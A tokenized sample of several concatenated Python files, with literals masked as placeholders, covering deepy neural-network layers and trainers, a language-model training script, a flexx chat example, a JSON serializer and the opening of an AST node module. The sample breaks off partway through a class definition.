RecurrentLayer ) : <EOL> def __init__ ( self , hidden_size , ** kwargs ) : <EOL> kwargs [ "<STR_LIT>" ] = hidden_size <EOL> super ( RNN , self ) . __init__ ( "<STR_LIT>" , [ "<STR_LIT:state>" ] , ** kwargs ) <EOL> @ neural_computation <EOL> def compute_new_state ( self , step_inputs ) : <EOL> xh_t , h_tm1 = map ( step_inputs . get , [ "<STR_LIT>" , "<STR_LIT:state>" ] ) <EOL> if not xh_t : <EOL> xh_t = <NUM_LIT:0> <EOL> h_t = self . activate ( xh_t + T . dot ( h_tm1 , self . W_h ) + self . b_h ) <EOL> return { "<STR_LIT:state>" : h_t } <EOL> @ neural_computation <EOL> def merge_inputs ( self , input_var , additional_inputs = None ) : <EOL> if not additional_inputs : <EOL> additional_inputs = [ ] <EOL> all_inputs = [ input_var ] + additional_inputs <EOL> h_inputs = [ ] <EOL> for x , weights in zip ( all_inputs , self . input_weights ) : <EOL> wi , = weights <EOL> h_inputs . append ( T . dot ( x , wi ) ) <EOL> merged_inputs = { <EOL> "<STR_LIT>" : sum ( h_inputs ) <EOL> } <EOL> return merged_inputs <EOL> def prepare ( self ) : <EOL> self . output_dim = self . hidden_size <EOL> self . W_h = self . create_weight ( self . hidden_size , self . hidden_size , "<STR_LIT:h>" , initializer = self . inner_init ) <EOL> self . b_h = self . create_bias ( self . hidden_size , "<STR_LIT:h>" ) <EOL> self . register_parameters ( self . W_h , self . b_h ) <EOL> self . input_weights = [ ] <EOL> if self . _input_type == "<STR_LIT>" : <EOL> all_input_dims = [ self . input_dim ] + self . additional_input_dims <EOL> for i , input_dim in enumerate ( all_input_dims ) : <EOL> wi = self . create_weight ( input_dim , self . hidden_size , "<STR_LIT>" . format ( i + <NUM_LIT:1> ) , initializer = self . outer_init ) <EOL> weights = [ wi ] <EOL> self . input_weights . append ( weights ) <EOL> self . register_parameters ( * weights ) </s>
<s> import logging <EOL> from deepy . trainers import THEANO_LINKER <EOL> from deepy . trainers . base import NeuralTrainer <EOL> from deepy . utils import FLOATX <EOL> import theano <EOL> import numpy as np <EOL> import theano . tensor as T <EOL> import scipy <EOL> class ScipyTrainer ( NeuralTrainer ) : <EOL> """<STR_LIT>""" <EOL> METHODS = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def __init__ ( self , network , method , config = None ) : <EOL> super ( ScipyTrainer , self ) . __init__ ( network , config ) <EOL> self . method = method <EOL> self . scipy_updates = config . get ( "<STR_LIT>" , <NUM_LIT:5> ) if config else <NUM_LIT:5> <EOL> logging . info ( '<STR_LIT>' ) <EOL> self . _shapes = [ p . get_value ( borrow = True ) . shape for p in self . network . parameters ] <EOL> self . _counts = [ np . prod ( s ) for s in self . _shapes ] <EOL> self . _starts = np . cumsum ( [ <NUM_LIT:0> ] + self . _counts ) [ : - <NUM_LIT:1> ] <EOL> self . _dtype = FLOATX <EOL> self . _gradient_func = None <EOL> self . learning_func = True <EOL> def train_step ( self , train_set , train_size = None ) : <EOL> res = scipy . optimize . minimize ( <EOL> fun = self . _function_at , <EOL> jac = self . _gradient_at , <EOL> x0 = self . _arrays_to_flat ( self . best_params [ <NUM_LIT:0> ] ) , <EOL> args = ( train_set , ) , <EOL> method = self . method , <EOL> options = dict ( maxiter = self . scipy_updates ) , <EOL> ) <EOL> self . set_params ( self . _flat_to_arrays ( res . x ) ) <EOL> return [ ( '<STR_LIT>' , res . fun ) ] <EOL> def _gradient_function ( self ) : <EOL> if not self . _gradient_func : <EOL> params = self . network . parameters <EOL> inputs = self . network . input_variables + self . network . target_variables <EOL> self . _gradient_func = theano . function ( inputs , T . grad ( self . cost , params ) , <EOL> allow_input_downcast = True , mode = theano . Mode ( linker = THEANO_LINKER ) ) <EOL> return self . _gradient_func <EOL> def _function_at ( self , x , train_set ) : <EOL> self . set_params ( self . _flat_to_arrays ( x ) ) <EOL> return np . mean ( [ self . evaluation_func ( * x ) [ <NUM_LIT:0> ] for x in train_set ] ) <EOL> def _gradient_at ( self , x , train_set ) : <EOL> self . set_params ( self . _flat_to_arrays ( x ) ) <EOL> grads = [ [ ] for _ in range ( len ( self . network . parameters ) ) ] <EOL> grad_func = self . _gradient_function ( ) <EOL> for x in train_set : <EOL> for i , g in enumerate ( grad_func ( * x ) ) : <EOL> grads [ i ] . append ( np . asarray ( g ) ) <EOL> return self . _arrays_to_flat ( [ np . mean ( g , axis = <NUM_LIT:0> ) for g in grads ] ) <EOL> def _flat_to_arrays ( self , x ) : <EOL> x = x . astype ( self . _dtype ) <EOL> return [ x [ o : o + n ] . reshape ( s ) for s , o , n in <EOL> zip ( self . _shapes , self . _starts , self . _counts ) ] <EOL> def _arrays_to_flat ( self , arrays ) : <EOL> x = np . zeros ( ( sum ( self . _counts ) , ) , self . _dtype ) <EOL> for arr , o , n in zip ( arrays , self . _starts , self . _counts ) : <EOL> x [ o : o + n ] = arr . ravel ( ) <EOL> return x </s>
<s> import sys <EOL> import numpy as np <EOL> from numpy import linalg as LA <EOL> from theano import tensor as T <EOL> import theano <EOL> from deepy . utils . functions import FLOATX <EOL> from deepy . trainers import CustomizeTrainer <EOL> from deepy . trainers . optimize import optimize_function <EOL> class FirstGlimpseTrainer ( CustomizeTrainer ) : <EOL> def __init__ ( self , network , attention_layer , config ) : <EOL> """<STR_LIT>""" <EOL> super ( FirstGlimpseTrainer , self ) . __init__ ( network , config ) <EOL> self . large_cov_mode = False <EOL> self . batch_size = config . get ( "<STR_LIT>" , <NUM_LIT:20> ) <EOL> self . disable_backprop = config . get ( "<STR_LIT>" , False ) <EOL> self . disable_reinforce = config . get ( "<STR_LIT>" , False ) <EOL> self . last_average_reward = <NUM_LIT> <EOL> self . turn = <NUM_LIT:1> <EOL> self . layer = attention_layer <EOL> if self . disable_backprop : <EOL> grads = [ ] <EOL> else : <EOL> grads = [ T . grad ( self . cost , p ) for p in network . weights + network . biases ] <EOL> if self . disable_reinforce : <EOL> grad_l = self . layer . W_l <EOL> grad_f = self . layer . W_f <EOL> else : <EOL> grad_l = self . layer . wl_grad <EOL> grad_f = self . layer . wf_grad <EOL> self . batch_wl_grad = np . zeros ( attention_layer . W_l . get_value ( ) . shape , dtype = FLOATX ) <EOL> self . batch_wf_grad = np . zeros ( attention_layer . W_f . get_value ( ) . shape , dtype = FLOATX ) <EOL> self . batch_grad = [ np . zeros ( p . get_value ( ) . shape , dtype = FLOATX ) for p in network . weights + network . biases ] <EOL> self . grad_func = theano . function ( network . inputs , <EOL> [ self . cost , grad_l , grad_f , attention_layer . positions , attention_layer . last_decision ] + grads , <EOL> allow_input_downcast = True ) <EOL> self . opt_func = optimize_function ( self . network . weights + self . network . biases , self . config ) <EOL> self . rl_opt_func = optimize_function ( [ self . layer . W_l , self . layer . W_f ] , self . config ) <EOL> def update_parameters ( self , update_rl ) : <EOL> if not self . disable_backprop : <EOL> grads = [ self . batch_grad [ i ] / self . batch_size for i in range ( len ( self . network . weights + self . network . biases ) ) ] <EOL> self . opt_func ( * grads ) <EOL> if update_rl and not self . disable_reinforce : <EOL> if np . sum ( self . batch_wl_grad ) == <NUM_LIT:0> or np . sum ( self . batch_wf_grad ) == <NUM_LIT:0> : <EOL> sys . stdout . write ( "<STR_LIT>" ) <EOL> sys . stdout . flush ( ) <EOL> else : <EOL> grad_wl = self . batch_wl_grad / self . batch_size <EOL> grad_wf = self . batch_wf_grad / self . batch_size <EOL> self . rl_opt_func ( grad_wl , grad_wf ) <EOL> def train_func ( self , train_set ) : <EOL> cost_sum = <NUM_LIT:0.0> <EOL> batch_cost = <NUM_LIT:0.0> <EOL> counter = <NUM_LIT:0> <EOL> total = <NUM_LIT:0> <EOL> total_reward = <NUM_LIT:0> <EOL> batch_reward = <NUM_LIT:0> <EOL> total_position_value = <NUM_LIT:0> <EOL> pena_count = <NUM_LIT:0> <EOL> for d in train_set : <EOL> pairs = self . grad_func ( * d ) <EOL> cost = pairs [ <NUM_LIT:0> ] <EOL> if cost > <NUM_LIT:10> or np . isnan ( cost ) : <EOL> sys . stdout . write ( "<STR_LIT:X>" ) <EOL> sys . stdout . flush ( ) <EOL> continue <EOL> batch_cost += cost <EOL> wl_grad = pairs [ <NUM_LIT:1> ] <EOL> wf_grad = pairs [ <NUM_LIT:2> ] <EOL> max_position_value = np . max ( np . absolute ( pairs [ <NUM_LIT:3> ] ) ) <EOL> total_position_value += max_position_value <EOL> last_decision = pairs [ <NUM_LIT:4> ] <EOL> target_decision = d [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> reward = <NUM_LIT> if last_decision == target_decision else <NUM_LIT:0> <EOL> if max_position_value > <NUM_LIT> : <EOL> reward = <NUM_LIT:0> <EOL> total_reward += reward <EOL> batch_reward += reward <EOL> if self . last_average_reward == <NUM_LIT> and total > <NUM_LIT> : <EOL> self . last_average_reward = total_reward / total <EOL> if not self . disable_reinforce : <EOL> self . batch_wl_grad += wl_grad * - ( reward - self . last_average_reward ) <EOL> self . batch_wf_grad += wf_grad * - ( reward - self . last_average_reward ) <EOL> if not self . disable_backprop : <EOL> for grad_cache , grad in zip ( self . batch_grad , pairs [ <NUM_LIT:5> : ] ) : <EOL> grad_cache += grad <EOL> counter += <NUM_LIT:1> <EOL> total += <NUM_LIT:1> <EOL> if counter >= self . batch_size : <EOL> if total == counter : counter -= <NUM_LIT:1> <EOL> self . update_parameters ( self . last_average_reward < <NUM_LIT> ) <EOL> if not self . disable_reinforce : <EOL> self . batch_wl_grad *= <NUM_LIT:0> <EOL> self . batch_wf_grad *= <NUM_LIT:0> <EOL> if not self . disable_backprop : <EOL> for grad_cache in self . batch_grad : <EOL> grad_cache *= <NUM_LIT:0> <EOL> if total % <NUM_LIT:1000> == <NUM_LIT:0> : <EOL> sys . stdout . write ( "<STR_LIT:.>" ) <EOL> sys . stdout . flush ( ) <EOL> if not self . disable_reinforce : <EOL> cov_changed = False <EOL> if batch_reward / self . batch_size < <NUM_LIT> : <EOL> if not self . large_cov_mode : <EOL> if pena_count > <NUM_LIT:20> : <EOL> self . layer . cov . set_value ( self . layer . large_cov ) <EOL> print "<STR_LIT>" , <EOL> cov_changed = True <EOL> else : <EOL> pena_count += <NUM_LIT:1> <EOL> else : <EOL> pena_count = <NUM_LIT:0> <EOL> else : <EOL> if self . large_cov_mode : <EOL> if pena_count > <NUM_LIT:20> : <EOL> self . layer . cov . set_value ( self . layer . small_cov ) <EOL> print "<STR_LIT>" , <EOL> cov_changed = True <EOL> else : <EOL> pena_count += <NUM_LIT:1> <EOL> else : <EOL> pena_count = <NUM_LIT:0> <EOL> if cov_changed : <EOL> self . large_cov_mode = not self . large_cov_mode <EOL> self . layer . cov_inv_var . set_value ( np . array ( LA . inv ( self . layer . cov . get_value ( ) ) , dtype = FLOATX ) ) <EOL> self . layer . cov_det_var . set_value ( LA . det ( self . layer . cov . get_value ( ) ) ) <EOL> counter = <NUM_LIT:0> <EOL> cost_sum += batch_cost <EOL> batch_cost = <NUM_LIT:0.0> <EOL> batch_reward = <NUM_LIT:0> <EOL> if total == <NUM_LIT:0> : <EOL> return "<STR_LIT>" <EOL> sys . stdout . write ( "<STR_LIT:\n>" ) <EOL> self . last_average_reward = ( total_reward / total ) <EOL> self . turn += <NUM_LIT:1> <EOL> return "<STR_LIT>" % ( ( cost_sum / total ) , self . last_average_reward , ( total_position_value / total ) ) </s>
<s> import os <EOL> import logging <EOL> from argparse import ArgumentParser <EOL> from utils import load_data <EOL> from lm import NeuralLM <EOL> from deepy . trainers import SGDTrainer , LearningRateAnnealer , AdamTrainer <EOL> from deepy . layers import LSTM <EOL> from layers import FullOutputLayer <EOL> logging . basicConfig ( level = logging . INFO ) <EOL> default_model = os . path . join ( os . path . dirname ( __file__ ) , "<STR_LIT>" , "<STR_LIT>" ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> ap = ArgumentParser ( ) <EOL> ap . add_argument ( "<STR_LIT>" , default = "<STR_LIT>" ) <EOL> ap . add_argument ( "<STR_LIT>" , action = "<STR_LIT:store_true>" ) <EOL> args = ap . parse_args ( ) <EOL> vocab , lmdata = load_data ( small = args . small , history_len = <NUM_LIT:5> , batch_size = <NUM_LIT:64> ) <EOL> model = NeuralLM ( vocab . size ) <EOL> model . stack ( LSTM ( hidden_size = <NUM_LIT:100> , output_type = "<STR_LIT>" , <EOL> persistent_state = True , batch_size = lmdata . size , <EOL> reset_state_for_input = <NUM_LIT:0> ) , <EOL> FullOutputLayer ( vocab . size ) ) <EOL> if os . path . exists ( args . model ) : <EOL> model . load_params ( args . model ) <EOL> trainer = SGDTrainer ( model , { "<STR_LIT>" : LearningRateAnnealer . learning_rate ( <NUM_LIT> ) , <EOL> "<STR_LIT>" : <NUM_LIT> } ) <EOL> annealer = LearningRateAnnealer ( trainer ) <EOL> trainer . run ( lmdata , controllers = [ annealer ] ) <EOL> model . save_params ( default_model ) </s>
<s> from diu . main import Application as RealApplication <EOL> class Application ( RealApplication ) : <EOL> def _load_config ( self , * files ) : <EOL> self . config = { } <EOL> self . given_config_files = files <EOL> class TestApplication ( object ) : <EOL> def test_deprecated_file_argument_takes_precedence ( self ) : <EOL> app = Application ( [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> assert app . given_config_files == ( "<STR_LIT>" , ) <EOL> def test_no_file_arg_uses_etc_docker_image_updater_yml ( self ) : <EOL> app = Application ( [ ] ) <EOL> assert app . given_config_files == ( "<STR_LIT>" , ) </s>
<s> """<STR_LIT>""" <EOL> from flexx import app , ui , react <EOL> nsamples = <NUM_LIT:16> <EOL> @ react . input <EOL> def message_relay ( msg ) : <EOL> """<STR_LIT>""" <EOL> return msg + '<STR_LIT>' <EOL> class MessageBox ( ui . Label ) : <EOL> CSS = """<STR_LIT>""" <EOL> @ app . serve <EOL> class ChatRoom ( ui . Widget ) : <EOL> """<STR_LIT>""" <EOL> def init ( self ) : <EOL> with ui . HBox ( ) : <EOL> ui . Widget ( flex = <NUM_LIT:1> ) <EOL> with ui . VBox ( ) : <EOL> self . name = ui . LineEdit ( placeholder_text = '<STR_LIT>' ) <EOL> self . people = ui . Label ( flex = <NUM_LIT:1> , size = ( <NUM_LIT> , <NUM_LIT:0> ) ) <EOL> with ui . VBox ( ) : <EOL> self . messages = MessageBox ( flex = <NUM_LIT:1> ) <EOL> with ui . HBox ( ) : <EOL> self . message = ui . LineEdit ( flex = <NUM_LIT:1> , placeholder_text = '<STR_LIT>' ) <EOL> self . ok = ui . Button ( text = '<STR_LIT>' ) <EOL> ui . Widget ( flex = <NUM_LIT:1> ) <EOL> self . _update_participants ( ) <EOL> def _update_participants ( self ) : <EOL> if not self . session . status : <EOL> return <EOL> proxies = app . manager . get_connections ( self . __class__ . __name__ ) <EOL> names = [ p . app . name . text ( ) for p in proxies ] <EOL> text = '<STR_LIT>' % len ( names ) <EOL> text += '<STR_LIT>' . join ( [ name or '<STR_LIT>' for name in sorted ( names ) ] ) <EOL> self . people . text ( text ) <EOL> app . call_later ( <NUM_LIT:3> , self . _update_participants ) <EOL> @ react . connect ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def _send_message ( self , down , submit ) : <EOL> text = self . message . text ( ) <EOL> if text : <EOL> name = self . name . text ( ) or '<STR_LIT>' <EOL> message_relay ( '<STR_LIT>' % ( name , text ) ) <EOL> self . message . text ( '<STR_LIT>' ) <EOL> @ react . connect ( '<STR_LIT>' ) <EOL> def new_text ( self , text ) : <EOL> return text <EOL> class JS : <EOL> @ react . connect ( '<STR_LIT>' ) <EOL> def _update_total_text ( self , text ) : <EOL> self . messages . text ( self . messages . text ( ) + text ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> app . start ( ) </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> undefined = None <EOL> class JSON : <EOL> @ staticmethod <EOL> def parse ( text , reviver = None ) : <EOL> return json . loads ( text , object_hook = reviver ) <EOL> @ staticmethod <EOL> def stringify ( obj , replacer = None ) : <EOL> return json . dumps ( obj , default = replacer ) <EOL> class Serializer : <EOL> def __init__ ( self ) : <EOL> self . _revivers = _revivers = { } <EOL> def loads ( text ) : <EOL> return JSON . parse ( text , _reviver ) <EOL> def saves ( obj ) : <EOL> return JSON . stringify ( obj , _replacer ) <EOL> def add_reviver ( type_name , func ) : <EOL> assert isinstance ( type_name , str ) <EOL> _revivers [ type_name ] = func <EOL> def _reviver ( dct , val = undefined ) : <EOL> if val is not undefined : <EOL> dct = val <EOL> if isinstance ( dct , dict ) : <EOL> type = dct . get ( '<STR_LIT>' , None ) <EOL> if type is not None : <EOL> func = _revivers . get ( type , None ) <EOL> if func is not None : <EOL> return func ( dct ) <EOL> return dct <EOL> def _replacer ( obj , val = undefined ) : <EOL> if val is undefined : <EOL> try : <EOL> return obj . __json__ ( ) <EOL> except AttributeError : <EOL> raise TypeError ( '<STR_LIT>' % obj ) <EOL> else : <EOL> if ( val is not None ) and val . __json__ : <EOL> return val . __json__ ( ) <EOL> return val <EOL> self . loads = loads <EOL> self . saves = saves <EOL> self . add_reviver = add_reviver <EOL> serializer = Serializer ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function , absolute_import <EOL> import sys <EOL> import ast <EOL> import json <EOL> from base64 import encodestring as encodebytes , decodestring as decodebytes <EOL> pyversion = sys . version_info <EOL> NoneType = None . __class__ <EOL> if pyversion >= ( <NUM_LIT:3> , ) : <EOL> basestring = str <EOL> docheck = '<STR_LIT>' in sys . modules <EOL> def parse ( code , comments = False ) : <EOL> """<STR_LIT>""" <EOL> converter = NativeAstConverter ( code ) <EOL> return converter . convert ( comments ) <EOL> class Node ( object ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> class OPS : <EOL> """<STR_LIT>""" <EOL> UAdd = '<STR_LIT>' <EOL> USub = '<STR_LIT>' <EOL> Not = '<STR_LIT>' <EOL> Invert = '<STR_LIT>' <EOL> Add = '<STR_LIT>' <EOL> Sub = '<STR_LIT>' <EOL> Mult = '<STR_LIT>' <EOL> Div = '<STR_LIT>' <EOL> FloorDiv = '<STR_LIT>' <EOL> Mod = '<STR_LIT>' <EOL> Pow = '<STR_LIT>' <EOL> LShift = '<STR_LIT>' <EOL> RShift = '<STR_LIT>' <EOL> BitOr = '<STR_LIT>' <EOL> BitXor = '<STR_LIT>' <EOL> BitAnd = '<STR_LIT>' <EOL> And = '<STR_LIT>' <EOL> Or = '<STR_LIT>' <EOL> class COMP : <EOL> """<STR_LIT>""" <EOL> Eq = '<STR_LIT>' <EOL> NotEq = '<STR_LIT>' <EOL> Lt = '<STR_LIT>' <EOL> LtE = '<STR_LIT>' <EOL> Gt = '<STR_LIT>' <EOL> GtE = '<STR_LIT>' <EOL> Is = '<STR_LIT>' <EOL> IsNot = '<STR_LIT>' <EOL> In = '<STR_LIT>' <EOL> NotIn = '<STR_LIT>' <EOL> def __init__ ( self , * args ) : <EOL> names = self . __slots__ <EOL> assert len ( args ) == len ( names ) <EOL> if docheck : <EOL> assert not hasattr ( self , '<STR_LIT>' ) , '<STR_LIT>' <EOL> assert self . __class__ is not Node , '<STR_LIT>' <EOL> for name , val in zip ( names , args ) : <EOL> assert not isinstance ( val , ast . AST ) <EOL> if name == '<STR_LIT:name>' : <EOL> assert isinstance ( val , ( basestring , NoneType ) ) , '<STR_LIT>' <EOL> elif name == '<STR_LIT>' : <EOL> assert val in Node . OPS . __dict__ or val in Node . COMP . __dict__ <EOL> elif name . endswith ( '<STR_LIT>' ) : <EOL> assert isinstance ( val , ( Node , NoneType ) ) , '<STR_LIT>' % name <EOL> elif name . endswith ( '<STR_LIT>' ) : <EOL> islistofnodes = ( isinstance ( val , list ) and <EOL> all ( isinstance ( n , Node ) for n in val ) ) <EOL> assert islistofnodes , '<STR_LIT>' % name <EOL> else : <EOL> assert not isinstance ( val , Node ) , '<STR_LIT>' % name <EOL> assert not ( isinstance ( val , list ) and <EOL> all ( isinstance ( n , Node ) for n in val ) ) <EOL> for name , val in zip ( names , args ) : <EOL> setattr ( self , name , val ) <EOL> def tojson ( self , indent = <NUM_LIT:2> ) : <EOL> """<STR_LIT>""" <EOL> return json . dumps ( self . _todict ( ) , indent = indent , sort_keys = True ) <EOL> @ classmethod <EOL> def fromjson ( cls , text ) : <EOL> """<STR_LIT>""" <EOL> return Node . _fromdict ( json . loads ( text ) ) <EOL> @ classmethod <EOL> def _fromdict ( cls , d ) : <EOL> assert '<STR_LIT>' in d <EOL> Cls = globals ( ) [ d [ '<STR_LIT>' ] ] <EOL> args = [ ] <EOL> for name in Cls . __slots__ : <EOL> val = d [ name ] <EOL> if val is None : <EOL> pass <EOL> elif name . endswith ( '<STR_LIT>' ) : <EOL> val = Node . _fromdict ( val ) <EOL> elif name . endswith ( '<STR_LIT>' ) : <EOL> val = [ Node . _fromdict ( x ) for x in val ] <EOL> elif isinstance ( val , basestring ) : <EOL> if val . startswith ( '<STR_LIT>' ) : <EOL> val = decodebytes ( val [ <NUM_LIT:6> : ] . encode ( '<STR_LIT:utf-8>' ) ) <EOL> elif val . startswith ( '<STR_LIT>' ) : <EOL> val = complex ( val [ <NUM_LIT:8> : ] ) <EOL> elif pyversion < ( <NUM_LIT:3> , ) : <EOL> val = unicode ( val ) <EOL> args . append ( val ) <EOL> return Cls ( * args ) <EOL> def _todict ( self ) : <EOL> """<STR_LIT>""" <EOL> d = { } <EOL> d [ '<STR_LIT>' ] = self . __class__ . __name__ <EOL> for name in self . __slots__ : <EOL> val = getattr ( self , name ) <EOL> if val is None : <EOL> pass <EOL> elif name . endswith ( '<STR_LIT>' ) : <EOL> val = val . _todict ( ) <EOL> elif name . endswith ( '<STR_LIT>' ) : <EOL> val = [ x . _todict ( ) for x in val ] <EOL> elif isinstance ( self , Bytes ) and isinstance ( val , bytes ) : <EOL> val = '<STR_LIT>' + encodebytes ( val ) . decode ( '<STR_LIT:utf-8>' ) . rstrip ( ) <EOL> elif isinstance ( self , Num ) and isinstance ( val , complex ) : <EOL> val = '<STR_LIT>' + repr ( val ) <EOL> d [ name ] = val <EOL> return d <EOL> def __eq__ ( self , other ) : <EOL> if not isinstance ( other , Node ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return self . _todict ( ) == other . _todict ( ) <EOL> def __repr__ ( self ) : <EOL> names = '<STR_LIT:U+002CU+0020>' . join ( [ repr ( x ) for x in self . __slots__ ] ) <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , names , id ( self ) ) <EOL> def __str__ ( self ) : <EOL> return self . tojson ( ) <EOL> try : <EOL> Node . OPS . __doc__ += '<STR_LIT:U+002CU+0020>' . join ( [ x for x in sorted ( Node . OPS . __dict__ ) <EOL> if not x . startswith ( '<STR_LIT:_>' ) ] ) <EOL> Node . COMP . __doc__ += '<STR_LIT:U+002CU+0020>' . join ( [ x for x in sorted ( Node . COMP . __dict__ ) <EOL> if not x . startswith ( '<STR_LIT:_>' ) ] ) <EOL> except AttributeError : <EOL> pass <EOL> class Comment ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT:value>' , <EOL> class Module ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , <EOL> class Num ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT:value>' , <EOL> class Str ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT:value>' , <EOL> class Bytes ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT:value>' , <EOL> class List ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , <EOL> class Tuple ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , <EOL> class Set ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , <EOL> class Dict ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' <EOL> class Ellipsis ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( ) <EOL> class NameConstant ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT:value>' , <EOL> class Name ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT:name>' , <EOL> class Starred ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , <EOL> class Attribute ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' <EOL> class Subscript ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' <EOL> class Index ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , <EOL> class Slice ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> class ExtSlice ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , <EOL> class Expr ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , <EOL> class UnaryOp ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' <EOL> class BinOp ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> class BoolOp ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' <EOL> class Compare ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> class Call ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class Keyword ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( '<STR_LIT:name>' , '<STR_LIT>' ) <EOL> class IfExp ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> class ListComp ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' <EOL> class SetComp ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' <EOL> class GeneratorExp ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' <EOL> class DictComp ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> class Comprehension ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> class Assign ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' <EOL> class AugAssign ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> class Raise ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' <EOL> class Assert ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' <EOL> class Delete ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , <EOL> class Pass ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( ) <EOL> class Import ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT:root>' , '<STR_LIT>' , '<STR_LIT>' <EOL> class If ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> class For ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> class While ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> class Break ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( ) <EOL> class Continue ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( ) <EOL> class Try ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> class ExceptHandler ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' <EOL> class With ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' <EOL> class WithItem ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' <EOL> class FunctionDef ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> class Lambda ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> class Arg ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class Return ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = 